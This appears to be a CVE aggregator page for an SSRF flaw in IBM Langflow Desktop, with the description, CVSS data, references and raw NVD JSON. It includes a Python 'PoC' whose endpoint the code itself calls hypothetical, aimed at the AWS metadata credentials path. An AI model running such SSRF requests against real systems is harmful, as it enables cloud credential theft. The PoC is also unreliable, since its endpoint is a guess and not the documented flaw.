CVE-2026-3340

Description

IBM Langflow Desktop 1.0.0 through 1.8.4 IBM Langflow is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:* - VULNERABLE

IBM Langflow Desktop 1.0.0

IBM Langflow Desktop 1.8.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_ssrf(target_host, malicious_url):
    """
    Exploit SSRF vulnerability in IBM Langflow Desktop.
    This script sends a request to the target server forcing it to fetch the malicious_url.
    """
    # Hypothetical endpoint that triggers the vulnerability
    endpoint = f"{target_host}/api/v1/some-internal-fetch"
    
    # Payload containing the internal resource URL
    payload = {
        "url": malicious_url
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, json=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful. Check response for internal data:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:5000" # Replace with actual target
    # Example: attempting to access AWS metadata
    internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    exploit_ssrf(target, internal_target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3340
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3340
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3340/
[4] VulDB https://vuldb.com/cve/CVE-2026-3340
[5] https://www.ibm.com/support/pages/node/7271096

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3340", "sourceIdentifier": "[email protected]", "published": "2026-04-30T21:16:32.463", "lastModified": "2026-05-11T17:05:34.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow Desktop 1.0.0 through 1.8.4 IBM Langflow is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "1.8.4", "matchCriteriaId": "83CB6A3F-0146-4A7A-9FDF-7F49CCBBC143"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7271096", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}